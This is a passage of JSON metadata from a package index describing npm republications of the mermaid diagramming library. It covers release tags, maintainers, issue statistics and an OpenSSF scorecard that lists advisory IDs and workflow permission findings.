manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.516Z","dependent_packages_count":0,"downloads":69,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{},"purl":"pkg:npm/%40sautejfi/mermaid-monorepo","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@sautejfi/mermaid-monorepo","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@sautejfi/mermaid-monorepo","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@sautejfi/mermaid-monorepo/dependencies","status":"removed","funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@sautejfi%2Fmermaid-monorepo/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@sautejfi%2Fmermaid-monorepo/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@sautejfi%2Fmermaid-monorepo/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@sautejfi%2Fmermaid-monorepo/related_packages","maintainers":[{"uuid":"sautejfi","login":"sautejfi","name":null,"email":"florian.sautejeau@gmail.com","url":null,"packages_count":4,"html_url":"https://www.npmjs.com/~sautejfi","role":null,"created_at":"2023-07-27T12:30:11.541Z","updated_at":"2023-07-27T12:30:11.541Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sautejfi/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":9142430,"name":"@eten-lab/mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":"eten-lab","versions_count":7,"first_release_published_at":"2024-02-27T17:05:12.807Z","latest_release_published_at":"2024-05-03T01:44:04.095Z","latest_release_number":"0.1.2","last_synced_at":"2025-09-01T12:55:58.753Z","created_at":"2024-02-27T22:33:18.874Z","updated_at":"2025-09-01T14:17:50.517Z","registry_url":"https://www.npmjs.com/package/@eten-lab/mermaid","install_command":"npm install @eten-lab/mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.1.2"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%